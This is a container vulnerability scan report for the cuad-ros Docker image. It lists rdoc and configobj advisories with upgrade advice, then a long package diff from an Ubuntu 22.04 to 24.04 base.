rdoc 6.5.0 (gem) pkg:gem/rdoc@6.5.0 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Deserialization of Untrusted Data Affected range >=6.5.0 <6.5.1.1 Fixed version 6.5.1.1 CVSS Score 2.3 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N EPSS Score 2.463% EPSS Percentile 85th percentile Description An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby 3.x through 3.3.0. When parsing .rdoc_options (used for configuration in RDoc) as a YAML file, object injection and resultant remote code execution are possible because there are no restrictions on the classes that can be restored. When loading the documentation cache, object injection and resultant remote code execution are also possible if there were a crafted cache. We recommend to update the RDoc gem to version 6.6.3.1 or later. In order to ensure compatibility with bundled version in older Ruby series, you may update as follows instead: For Ruby 3.0 users: Update to rdoc 6.3.4.1 For Ruby 3.1 users: Update to rdoc 6.4.1.1 For Ruby 3.2 users: Update to rdoc 6.5.1.1 You can use gem update rdoc to update it. If you are using bundler, please add gem "rdoc", ">= 6.6.3.1" to your Gemfile. Note: 6.3.4, 6.4.1, 6.5.1 and 6.6.3 have a incorrect fix. We recommend to upgrade 6.3.4.1, 6.4.1.1, 6.5.1.1 and 6.6.3.1 instead of them.

configobj 5.0.8 (pypi) pkg:pypi/configobj@5.0.8 # Dockerfile (54:56) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-dev-tools Inefficient Regular Expression Complexity Affected range <5.0.9 Fixed version 5.0.9 CVSS Score 3.7 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L EPSS Score 0.070% EPSS Percentile 21st percentile Description All versions of the package configobj are vulnerable to Regular Expression Denial of Service (ReDoS) via the validate function, using (.+?)((.*)). Note: This is only exploitable in the case of a developer, putting the offending value in a server side configuration file.

[github-actions]

Recommended fixes for image (linux/arm64) ghcr.io/cuautodrone/cuad-ros:test

Base image is ubuntu:24.04

Name	24.04
Digest	sha256:68434214381cb38287104e629fe8ee720167dd98cbb36ab1cbbab342515fa6ab
Vulnerabilities
Pushed	2 weeks ago
Size	29 MB
Packages	131
OS	24.04

The base image is also available under the supported tag(s): latest, noble

Refresh base image

Rebuild the image using a newer base image version. Updating this may result in breaking changes.

✅ This image version is up to date.

Change base image

Tag	Details	Pushed	Vulnerabilities
26.04 Major OS version update Also known as: devel resolute resolute-20260108	Benefits: Image contains 9 fewer packages Image has similar size Image introduces no new vulnerability but removes 9 Major OS version update Image details: Size: 33 MB OS: 26.04	1 month ago
25.10 Major OS version update Also known as: rolling questing questing-20251217	Benefits: Image contains 7 fewer packages Image has similar size Image introduces no new vulnerability but removes 9 Major OS version update Image details: Size: 34 MB OS: 25.10	2 months ago

[JLP04]

Overview

Image reference	ghcr.io/cuautodrone/cuad-ros:latest	ghcr.io/cuautodrone/cuad-ros:test
- digest	2d8dc9a5b5a5	5f72f870a9e4
- tag	latest	test
- provenance	https://github.com/CUAutoDrone/cuad-docker-ros.git#refs/pull/19/merge/commit/87a41d56c5c353b31e1396c89a917af07ecb30e7	https://github.com/CUAutoDrone/cuad-docker-ros.git#refs/pull/20/merge/commit/8d16346c3f86b3d5c63219db0c929c2d99f71a86
- vulnerabilities
- platform	linux/arm64	linux/arm64
- size	2.9 GB	4.4 GB (+1.5 GB)
- packages	2286	2466 (+180)
Base Image	ubuntu:22.04 also known as: • jammy	ubuntu:24.04 also known as: • latest • noble
- vulnerabilities

Labels (1 changes)

• ± 1 changed
• 3 unchanged

 name=cuad-ros
 org.opencontainers.image.authors=cuautodrone
 org.opencontainers.image.ref.name=ubuntu
-org.opencontainers.image.version=22.04
+org.opencontainers.image.version=24.04

Packages and Vulnerabilities (2992 package changes and 236 vulnerability changes)

• ➕ 855 packages added
• ➖ 681 packages removed
• ♾️ 1456 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2647 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
♾️	adduser	3.118ubuntu5	3.137ubuntu1
♾️	adwaita-icon-theme	41.0-1ubuntu1	46.0-1
♾️	apt	2.4.14	2.8.3
♾️	astyle	3.1-2build1	3.1-3build1
➕	at-spi2-common		2.52.0-1build1
♾️	autoconf	2.71-2	2.71-3
♾️	automake	1:1.16.5-1.3	1:1.16.5-1.3ubuntu1
♾️	base-files	12ubuntu4.7	13ubuntu10.4
♾️	base-passwd	3.5.52build1	3.6.3build1
♾️	bash	5.1-6ubuntu1.1	5.2.21-2ubuntu4
♾️	binutils	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	binutils-aarch64-linux-gnu	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	binutils-arm-linux-gnueabihf	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	binutils-common	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	blt	2.5.3+dfsg-4.1build2	2.5.3+dfsg-7build1
➕	brz		3.3.5-6build2
♾️	bsdutils	1:2.37.2-4ubuntu3.4	1:2.39.3-9ubuntu6.4
♾️	build-essential	12.9ubuntu3	12.10ubuntu1
♾️	bzip2	1.0.8-5build1	1.0.8-5.1build0.1
➕	bzr		2.7.0+bzr6622+brz
♾️	ca-certificates	20240203~22.04.1	20240203
♾️	ca-certificates-java	20190909ubuntu1.2	20240118
♾️	catch2	2.13.8-1	3.4.0-1build1
♾️	ccache	4.5.1-1	4.9.1-1
♾️	cmake	3.22.1-1ubuntu1.22.04.2	3.28.3-1build7
♾️	cmake-data	3.22.1-1ubuntu1.22.04.2	3.28.3-1build7
♾️	comerr-dev	2.1-1.46.5-2ubuntu1.2	2.1-1.47.0-2.4~exp1ubuntu4.1
♾️	coreutils	8.32-4.1ubuntu1.2	9.4-3ubuntu6.1
♾️	cpp	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
➖	cpp-11	11.4.0-1ubuntu1~22.04.2
➖	cpp-11-arm-linux-gnueabihf	11.4.0-1ubuntu1~22.04cross1
➕	cpp-13		13.3.0-6ubuntu2~24.04.1
➕	cpp-13-aarch64-linux-gnu		13.3.0-6ubuntu2~24.04.1
➕	cpp-13-arm-linux-gnueabihf		13.3.0-6ubuntu2~24.04cross1
➕	cpp-aarch64-linux-gnu		4:13.2.0-7ubuntu1
♾️	cpp-arm-linux-gnueabihf	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
♾️	cppcheck	2.7-1	2.13.0-2ubuntu3
➕	cppzmq-dev		4.10.0-1build1
♾️	curl	7.81.0-1ubuntu1.21	8.5.0-2ubuntu10.7
♾️	dash	0.5.11+git20210903+057cd650a4ed-3build1	0.5.12-6ubuntu5
♾️	dbus	1.12.20-2ubuntu4.1	1.14.10-4ubuntu4.1
➕	dbus-bin		1.14.10-4ubuntu4.1
➕	dbus-daemon		1.14.10-4ubuntu4.1
➕	dbus-session-bus-common		1.14.10-4ubuntu4.1
➕	dbus-system-bus-common		1.14.10-4ubuntu4.1
♾️	dbus-user-session	1.12.20-2ubuntu4.1	1.14.10-4ubuntu4.1
♾️	dconf-gsettings-backend	0.40.0-3ubuntu0.1	0.40.0-4ubuntu0.1
♾️	dconf-service	0.40.0-3ubuntu0.1	0.40.0-4ubuntu0.1
♾️	debconf	1.5.79ubuntu1	1.5.86ubuntu1
♾️	debianutils	5.5-1ubuntu2	5.17build1
♾️	default-jdk	2:1.11-72build2	2:1.21-75+exp1
♾️	default-jdk-headless	2:1.11-72build2	2:1.21-75+exp1
♾️	default-jre	2:1.11-72build2	2:1.21-75+exp1
♾️	default-jre-headless	2:1.11-72build2	2:1.21-75+exp1
♾️	default-libmysqlclient-dev	1.0.8	1.1.0build1
➖	dh-elpa-helper	2.0.9ubuntu1
♾️	diffutils	1:3.8-0ubuntu2	1:3.10-1build1
♾️	dirmngr	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	distro-info-data	0.52ubuntu0.11	0.60ubuntu0.5
♾️	docutils-common	0.17.1+dfsg-2	0.20.1+dfsg-3
♾️	dpkg	1.21.1ubuntu2.6	1.22.6ubuntu6.5
♾️	dpkg-dev	1.21.1ubuntu2.6	1.22.6ubuntu6.5
♾️	e2fsprogs	1.46.5-2ubuntu1.2	1.47.0-2.4~exp1ubuntu4.1
➖	emacsen-common	3.0.4
♾️	file	1:5.41-3ubuntu0.1	1:5.45-3build1
♾️	findutils	4.8.0-1ubuntu3	4.9.0-5build1
♾️	fontconfig	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	fontconfig-config	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	fonts-dejavu-core	2.37-2build1	2.37-8
➕	fonts-dejavu-mono		2.37-8
♾️	fonts-freefont-ttf	20120503-10build1	20211204+svn4273-2
♾️	fonts-lyx	2.3.6-1	2.4.0~RC3-1build4
♾️	g++	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
➖	g++-11	11.4.0-1ubuntu1~22.04.2
➖	g++-11-arm-linux-gnueabihf	11.4.0-1ubuntu1~22.04cross1
➕	g++-13		13.3.0-6ubuntu2~24.04.1
➕	g++-13-aarch64-linux-gnu		13.3.0-6ubuntu2~24.04.1
➕	g++-13-arm-linux-gnueabihf		13.3.0-6ubuntu2~24.04cross1
➕	g++-aarch64-linux-gnu		4:13.2.0-7ubuntu1
♾️	g++-arm-linux-gnueabihf	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
♾️	gawk	1:5.1.0-1ubuntu0.1	1:5.2.1-2build3
♾️	gcc	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
➖	gcc-11	11.4.0-1ubuntu1~22.04.2
➖	gcc-11-arm-linux-gnueabihf	11.4.0-1ubuntu1~22.04cross1
➖	gcc-11-arm-linux-gnueabihf-base	11.4.0-1ubuntu1~22.04cross1
➖	gcc-11-base	11.4.0-1ubuntu1~22.04.2
➖	gcc-11-cross-base	11.4.0-1ubuntu1~22.04cross1
➖	gcc-12-base	12.3.0-1ubuntu1~22.04.2
➖	gcc-12-cross-base	12.3.0-1ubuntu1~22.04cross1
➕	gcc-13		13.3.0-6ubuntu2~24.04.1
➕	gcc-13-aarch64-linux-gnu		13.3.0-6ubuntu2~24.04.1
➕	gcc-13-arm-linux-gnueabihf		13.3.0-6ubuntu2~24.04cross1
➕	gcc-13-arm-linux-gnueabihf-base		13.3.0-6ubuntu2~24.04cross1
➕	gcc-13-base		13.3.0-6ubuntu2~24.04.1
➕	gcc-13-cross-base		13.3.0-6ubuntu2~24.04cross1
➕	gcc-14-base		14.2.0-4ubuntu2~24.04.1
➕	gcc-14-cross-base		14.2.0-4ubuntu2~24.04cross1
➕	gcc-aarch64-linux-gnu		4:13.2.0-7ubuntu1
♾️	gcc-arm-linux-gnueabihf	4:11.2.0-1ubuntu1	4:13.2.0-7ubuntu1
♾️	gcovr	5.0-2	7.0-1
♾️	gdal-data	3.4.1+dfsg-1build4	3.8.4+dfsg-3ubuntu3
➕	gdal-plugins		3.8.4+dfsg-3ubuntu3
♾️	geographiclib-tools	1.52-1	2.3-1build1
➖	gfortran-11	11.4.0-1ubuntu1~22.04.2
➕	gfortran-13		13.3.0-6ubuntu2~24.04.1
➕	gfortran-13-aarch64-linux-gnu		13.3.0-6ubuntu2~24.04.1
♾️	gir1.2-atk-1.0	2.36.0-3build1	2.52.0-1build1
➕	gir1.2-atspi-2.0		2.52.0-1build1
♾️	gir1.2-freedesktop	1.72.0-1	1.80.1-1
➕	gir1.2-freedesktop-dev		1.80.1-1
♾️	gir1.2-gdkpixbuf-2.0	2.42.8+dfsg-1ubuntu0.4	2.42.10+dfsg-3ubuntu3.2
➕	gir1.2-girepository-2.0		1.80.1-1
♾️	gir1.2-glib-2.0	1.72.0-1	2.80.0-6ubuntu3.8
➕	gir1.2-glib-2.0-dev		2.80.0-6ubuntu3.8
♾️	gir1.2-gst-plugins-base-1.0	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	gir1.2-gstreamer-1.0	1.20.3-0ubuntu1.1	1.24.2-1ubuntu0.1
♾️	gir1.2-gtk-3.0	3.24.33-1ubuntu2.2	3.24.41-4ubuntu1.3
♾️	gir1.2-gudev-1.0	1:237-2build1	1:238-5ubuntu1
♾️	gir1.2-harfbuzz-0.0	2.7.4-1ubuntu3.2	8.3.0-2build2
♾️	gir1.2-ibus-1.0	1.5.26-4	1.5.29-2
♾️	gir1.2-packagekitglib-1.0	1.2.5-2ubuntu3	1.2.8-2ubuntu1.4
♾️	gir1.2-pango-1.0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
♾️	git	1:2.34.1-1ubuntu1.15	1:2.43.0-1ubuntu7.3
♾️	git-gui	1:2.34.1-1ubuntu1.15	1:2.43.0-1ubuntu7.3
♾️	git-man	1:2.34.1-1ubuntu1.15	1:2.43.0-1ubuntu7.3
♾️	gitk	1:2.34.1-1ubuntu1.15	1:2.43.0-1ubuntu7.3
♾️	glib-networking	2.72.0-1	2.80.0-1build1
♾️	glib-networking-common	2.72.0-1	2.80.0-1build1
♾️	glib-networking-services	2.72.0-1	2.80.0-1build1
♾️	gnupg	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
➖	gnupg-l10n	2.2.27-3ubuntu2.4
♾️	gnupg-utils	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	google-mock	1.11.0-3	1.14.0-1
♾️	googletest	1.11.0-3	1.14.0-1
♾️	gpg	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	gpg-agent	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
➖	gpg-wks-client	2.2.27-3ubuntu2.4
➖	gpg-wks-server	2.2.27-3ubuntu2.4
♾️	gpgconf	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	gpgsm	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
♾️	gpgv	2.2.27-3ubuntu2.4	2.4.4-2ubuntu17.4
		Removed vulnerabilities (1):
♾️	graphviz	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	grep	3.7-1build1	3.11-4build1
♾️	gsettings-desktop-schemas	42.0-1ubuntu1	46.1-0ubuntu1
♾️	gstreamer1.0-gl	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	gstreamer1.0-libav	1.20.3-0ubuntu1	1.24.1-1build1
♾️	gstreamer1.0-plugins-bad	1.20.3-0ubuntu1.1	1.24.2-1ubuntu4
♾️	gstreamer1.0-plugins-base	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	gstreamer1.0-plugins-good	1.20.3-0ubuntu1.4	1.24.2-1ubuntu1.2
♾️	gtk-update-icon-cache	3.24.33-1ubuntu2.2	3.24.41-4ubuntu1.3
♾️	gz-harmonic	1.0.0-1~jammy	1.0.0-1~noble
♾️	gz-launch7-cli	7.0.0-1~jammy	7.1.1-1~noble
♾️	gz-plugin2-cli	2.0.4-1~jammy	2.0.4-1~noble
♾️	gz-sim8-cli	8.10.0-1~jammy	8.10.0-1~noble
♾️	gz-tools2	2.0.3-1~jammy	2.0.3-1~noble
♾️	gz-transport13-cli	13.5.0-1~jammy	13.5.0-1~noble
♾️	gzip	1.10-4ubuntu4.1	1.12-1ubuntu3.1
♾️	hdf5-helpers	1.10.7+repack-4ubuntu2	1.10.10+repack-3.1ubuntu4
♾️	hostname	3.23ubuntu2	3.23+nmu2ubuntu2
♾️	ibverbs-providers	39.0-1	50.0-2ubuntu0.2
♾️	icu-devtools	70.1-2	74.2-1ubuntu3.1
♾️	init-system-helpers	1.62	1.66ubuntu1
♾️	iso-codes	4.9.0-1	4.16.0-1
♾️	java-common	0.72build2	0.75+exp1
♾️	keyboard-configuration	1.205ubuntu3	1.226ubuntu1
➕	keyboxd		2.4.4-2ubuntu17.4
♾️	krb5-multidev	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	lcov	1.15-1	2.0-4ubuntu2
♾️	libaa1	1.4p5-50build1	1.4p5-51.1
♾️	libacl1	2.3.1-1	2.3.2-1build1.1
♾️	libaec-dev	1.0.6-1	1.1.2-1build1
♾️	libaec0	1.0.6-1	1.1.2-1build1
➕	libalgorithm-c3-perl		0.11-2
♾️	libann0	1.1.2+doc-7build1	1.1.2+doc-9build1
♾️	libaom-dev	3.3.0-1ubuntu0.1	3.8.2-2ubuntu0.1
♾️	libaom3	3.3.0-1ubuntu0.1	3.8.2-2ubuntu0.1
♾️	libapparmor1	3.0.4-2ubuntu2.5	4.0.1really4.0.1-0ubuntu0.24.04.5
➖	libappstream4	0.15.2-2
➕	libappstream5		1.0.2-1build6
➕	libapr1t64		1.7.2-3.1ubuntu0.1
➕	libaprutil1t64		1.6.3-1.1ubuntu7
➖	libapt-pkg6.0	2.4.14
➕	libapt-pkg6.0t64		2.8.3
➖	libarchive13	3.6.0-1ubuntu1.5
➕	libarchive13t64		3.7.2-2ubuntu0.5
♾️	libargon2-1	0~20171227-0.3	0~20190702+dfsg-4build1
♾️	libarmadillo-dev	1:10.8.2+dfsg-1	1:12.6.7+dfsg-1build2
➖	libarmadillo10	1:10.8.2+dfsg-1
➕	libarmadillo12		1:12.6.7+dfsg-1build2
➖	libarpack2	3.8.0-1
♾️	libarpack2-dev	3.8.0-1	3.9.1-1.1build2
➕	libarpack2t64		3.9.1-1.1build2
➖	libasan6	11.4.0-1ubuntu1~22.04.2
➖	libasan6-armhf-cross	11.4.0-1ubuntu1~22.04cross1
➕	libasan8		14.2.0-4ubuntu2~24.04.1
➕	libasan8-armhf-cross		14.2.0-4ubuntu2~24.04cross1
♾️	libasio-dev	1:1.18.1-1	1:1.28.1-0.2
➖	libasound2	1.2.6.1-1ubuntu1
		Removed vulnerabilities (1):
♾️	libasound2-data	1.2.6.1-1ubuntu1	1.2.11-1ubuntu0.2
♾️	libasound2-dev	1.2.6.1-1ubuntu1	1.2.11-1ubuntu0.2
➕	libasound2t64		1.2.11-1ubuntu0.2
♾️	libass9	1:0.15.2-1	1:0.17.1-2build1
♾️	libassimp-dev	5.2.2~ds0-1	5.3.1+ds-2build1
♾️	libassimp5	5.2.2~ds0-1	5.3.1+ds-2build1
♾️	libassuan0	2.5.5-1build1	2.5.6-1build1
♾️	libasyncns0	0.8-6build2	0.8-6build4
➖	libatk-bridge2.0-0	2.38.0-3
➕	libatk-bridge2.0-0t64		2.52.0-1build1
➕	libatk-bridge2.0-dev		2.52.0-1build1
➖	libatk1.0-0	2.36.0-3build1
➕	libatk1.0-0t64		2.52.0-1build1
➖	libatk1.0-data	2.36.0-3build1
➕	libatk1.0-dev		2.52.0-1build1
♾️	libatomic1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libatomic1-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
➖	libatspi2.0-0	2.44.0-3
➕	libatspi2.0-0t64		2.52.0-1build1
➕	libatspi2.0-dev		2.52.0-1build1
♾️	libattr1	1:2.5.1-1build1	1:2.5.2-1build1.1
♾️	libaudit-common	1:3.0.7-1build1	1:3.1.2-2.1build1.1
♾️	libaudit1	1:3.0.7-1build1	1:3.1.2-2.1build1.1
♾️	libavahi-client3	0.8-5ubuntu5.3	0.8-13ubuntu6.1
♾️	libavahi-common-data	0.8-5ubuntu5.3	0.8-13ubuntu6.1
♾️	libavahi-common3	0.8-5ubuntu5.3	0.8-13ubuntu6.1
		Removed vulnerabilities (3):
♾️	libavc1394-0	0.5.4-5build2	0.5.4-5build3
♾️	libavcodec-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavcodec58	7:4.4.2-0ubuntu0.22.04.1
➕	libavcodec60		7:6.1.1-3ubuntu5
♾️	libavdevice-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavdevice58	7:4.4.2-0ubuntu0.22.04.1
➕	libavdevice60		7:6.1.1-3ubuntu5
♾️	libavfilter-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavfilter7	7:4.4.2-0ubuntu0.22.04.1
➕	libavfilter9		7:6.1.1-3ubuntu5
♾️	libavformat-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavformat58	7:4.4.2-0ubuntu0.22.04.1
➕	libavformat60		7:6.1.1-3ubuntu5
➕	libavtp0		0.2.0-1build1
♾️	libavutil-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libavutil56	7:4.4.2-0ubuntu0.22.04.1
➕	libavutil58		7:6.1.1-3ubuntu5
➕	libb-hooks-endofscope-perl		0.28-1
➕	libb-hooks-op-check-perl		0.22-3build1
♾️	libbinutils	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	libblas-dev	3.10.0-2ubuntu1	3.12.0-3build1.1
♾️	libblas3	3.10.0-2ubuntu1	3.12.0-3build1.1
♾️	libblkid-dev	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libblkid1	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libblosc-dev	1.21.1+ds2-2	1.21.5+ds-1build1
♾️	libblosc1	1.21.1+ds2-2	1.21.5+ds-1build1
♾️	libbluray2	1:1.3.1-1	1:1.3.4-1build1
♾️	libboost-all-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-atomic-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-atomic1.74-dev	1.74.0-14ubuntu3
➖	libboost-atomic1.74.0	1.74.0-14ubuntu3
➕	libboost-atomic1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-atomic1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-chrono-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-chrono1.74-dev	1.74.0-14ubuntu3
➖	libboost-chrono1.74.0	1.74.0-14ubuntu3
➕	libboost-chrono1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-chrono1.83.0t64		1.83.0-2.1ubuntu3.2
♾️	libboost-container-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-container1.74-dev	1.74.0-14ubuntu3
➖	libboost-container1.74.0	1.74.0-14ubuntu3
➕	libboost-container1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-container1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-context-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-context1.74-dev	1.74.0-14ubuntu3
➖	libboost-context1.74.0	1.74.0-14ubuntu3
➕	libboost-context1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-context1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-coroutine-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-coroutine1.74-dev	1.74.0-14ubuntu3
➖	libboost-coroutine1.74.0	1.74.0-14ubuntu3
➕	libboost-coroutine1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-coroutine1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-date-time-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-date-time1.74-dev	1.74.0-14ubuntu3
➖	libboost-date-time1.74.0	1.74.0-14ubuntu3
➕	libboost-date-time1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-date-time1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-exception-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-exception1.74-dev	1.74.0-14ubuntu3
➕	libboost-exception1.83-dev		1.83.0-2.1ubuntu3.2
♾️	libboost-fiber-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-fiber1.74-dev	1.74.0-14ubuntu3
➖	libboost-fiber1.74.0	1.74.0-14ubuntu3
➕	libboost-fiber1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-fiber1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-filesystem-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-filesystem1.74-dev	1.74.0-14ubuntu3
➖	libboost-filesystem1.74.0	1.74.0-14ubuntu3
➕	libboost-filesystem1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-filesystem1.83.0		1.83.0-2.1ubuntu3.2

[JLP04]

Packages and Vulnerabilities (2992 package changes and 236 vulnerability changes)

• ➕ 855 packages added
• ➖ 681 packages removed
• ♾️ 1456 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2647 changes)

♾️	libboost-graph-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-graph-parallel-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-graph-parallel1.74-dev	1.74.0-14ubuntu3
➖	libboost-graph-parallel1.74.0	1.74.0-14ubuntu3
➕	libboost-graph-parallel1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-graph-parallel1.83.0		1.83.0-2.1ubuntu3.2
➖	libboost-graph1.74-dev	1.74.0-14ubuntu3
➖	libboost-graph1.74.0	1.74.0-14ubuntu3
➕	libboost-graph1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-graph1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-iostreams-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-iostreams1.74-dev	1.74.0-14ubuntu3
➖	libboost-iostreams1.74.0	1.74.0-14ubuntu3
➕	libboost-iostreams1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-iostreams1.83.0		1.83.0-2.1ubuntu3.2
➕	libboost-json-dev		1.83.0.1ubuntu2
➕	libboost-json1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-json1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-locale-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-locale1.74-dev	1.74.0-14ubuntu3
➖	libboost-locale1.74.0	1.74.0-14ubuntu3
➕	libboost-locale1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-locale1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-log-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-log1.74-dev	1.74.0-14ubuntu3
➖	libboost-log1.74.0	1.74.0-14ubuntu3
➕	libboost-log1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-log1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-math-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-math1.74-dev	1.74.0-14ubuntu3
➖	libboost-math1.74.0	1.74.0-14ubuntu3
➕	libboost-math1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-math1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-mpi-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-mpi-python-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-mpi-python1.74-dev	1.74.0-14ubuntu3
➖	libboost-mpi-python1.74.0	1.74.0-14ubuntu3
➕	libboost-mpi-python1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-mpi-python1.83.0		1.83.0-2.1ubuntu3.2
➖	libboost-mpi1.74-dev	1.74.0-14ubuntu3
➖	libboost-mpi1.74.0	1.74.0-14ubuntu3
➕	libboost-mpi1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-mpi1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-nowide-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-nowide1.74-dev	1.74.0-14ubuntu3
➖	libboost-nowide1.74.0	1.74.0-14ubuntu3
➕	libboost-nowide1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-nowide1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-numpy-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-numpy1.74-dev	1.74.0-14ubuntu3
➖	libboost-numpy1.74.0	1.74.0-14ubuntu3
➕	libboost-numpy1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-numpy1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-program-options-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-program-options1.74-dev	1.74.0-14ubuntu3
➖	libboost-program-options1.74.0	1.74.0-14ubuntu3
➕	libboost-program-options1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-program-options1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-python-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-python1.74-dev	1.74.0-14ubuntu3
➖	libboost-python1.74.0	1.74.0-14ubuntu3
➕	libboost-python1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-python1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-random-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
